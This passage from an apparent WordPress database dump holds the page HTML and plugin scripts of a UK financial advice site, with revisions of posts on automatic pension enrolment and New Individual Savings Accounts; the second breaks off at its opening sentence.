\'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"http://pinterest.com/pin/create/button/?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fautomatic-enrolment%2F&amp;description=What+is+Automatic+Enrolment&amp;media=\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=What is Automatic Enrolment&amp;body=http://www.equalitywalk.org.uk/automatic-enrolment/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../automatic-enrolment/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"8772\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"4db0ac52ce\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"217\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer><footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;	What is Automatic Enrolment','Read about','inherit','closed','closed','','52-revision-v1','','','2017-09-21 17:37:01','2017-09-21 17:37:01','',52,'http://www.equalitywalk.org.uk/52-revision-v1',0,'revision','',0),(332,1,'2017-09-21 17:38:35','2017-09-21 17:38:35','<div id=\"wrapper\">\n<div class=\"header-wrapper\">\n<div class=\"header-v4\">\n<div id=\"small-nav\">\n<div class=\"avada-row\"><nav id=\"nav\" class=\"nav-holder\">\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">onal Pensions</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\">Pension Review</a></li>\n</ul>\n</ul>\n&nbsp;\n<h3 class=\"fusion-megamenu-title\">More Information</h3>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>\n</ul>\n</ul>\n&nbsp;\n\n&nbsp;\n<ul class=\"navigation menu fusion-navbar-nav\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n 	<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47 fusion-dropdown-menu\"><a href=\"..\">Investments</a>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121 fusion-dropdown-submenu\"><a href=\"..isas/\">ISAs</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118 fusion-dropdown-submenu\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102 fusion-dropdown-submenu\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124 fusion-dropdown-submenu\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"navigation menu fusion-navbar-nav\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n 	<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46 fusion-dropdown-menu\"><a href=\"../\">Trusts</a>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108 fusion-dropdown-submenu\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114 fusion-dropdown-submenu\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115 fusion-dropdown-submenu\"><a href=\"../absolute-\">Absolute Trusts</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143 fusion-dropdown-submenu\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146 fusion-dropdown-submenu\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"navigation menu fusion-navbar-nav\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n 	<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381 fusion-dropdown-menu\"><a href=\"../insurance-protection/\">Insurance</a>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535 fusion-dropdown-submenu\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585 fusion-dropdown-submenu\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633 fusion-dropdown-submenu\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228 fusion-dropdown-submenu\"><a href=\"../life-insurance/\">Life Insurance</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243 fusion-dropdown-submenu\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"navigation menu fusion-navbar-nav\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n 	<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\">Login</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"navigation menu fusion-navbar-nav\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n 	<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a href=\"../our-blog/\">Blog</a>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7678\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7678 fusion-dropdown-submenu\"><a href=\"../resources/\">Resources</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"navigation menu fusion-navbar-nav\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n 	<li id=\"menu-item-7675\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7675\"><a href=\"../contact-us/\">Contact</a></li>\n</ul>\n</ul>\n&nbsp;\n\n</nav>\n<div class=\"mobile-nav-holder main-menu\"></div>\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n<div class=\"init-sticky-header\"></div>\n</div>\n&nbsp;\n<div id=\"sliders-container\"></div>\n&nbsp;\n<div class=\"page-title-container\">\n\n&nbsp;\n<div class=\"page-title\">\n\n&nbsp;\n<div class=\"page-title-wrapper\">\n\n&nbsp;\n<div class=\"page-title-captions\">\n\n&nbsp;\n<h1 class=\"entry-title\">\nThe New Individual Savings Accounts</h1>\n&nbsp;\n\n</div>\n&nbsp;\n<ul class=\"breadcrumbs\">\n 	<li><a href=\"/\">Home</a></li>\n 	<li><a title=\"Wealth Management\" href=\"../category/wealth-management/\">Wealth Management</a></li>\n 	<li><a title=\"Investments\" href=\"../category\">Investments</a></li>\n 	<li>The New Individual Savings Accounts</li>\n</ul>\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n<div id=\"main\" class=\"clearfix \">\n\n&nbsp;\n<div class=\"avada-row\">\n<div id=\"post-8425\" class=\"post-8425 post type-post status-publish format-standard has-post-thumbnail hentry category-investments category-wealth-management post\">\n<span class=\"entry-title\" style=\"display: none;\">The New Individual Savings Accounts</span>\n<div class=\"post-content\">\n\n&nbsp;\n<h1 style=\"text-align: center;\">The New Individual Savings Accounts – Q&amp;A</h1>\n&nbsp;\n<h3 style=\"text-align: center;\">By : Reading Time 4 Minutes</h3>\n&nbsp;\n\n&nbsp;\n\n…Or NISAs as we must learn to call them.\n\n&nbsp;\n\nMost of the headlines surrounding George Osborne’s recent Budget focused on the far-reaching changes he made to pensions 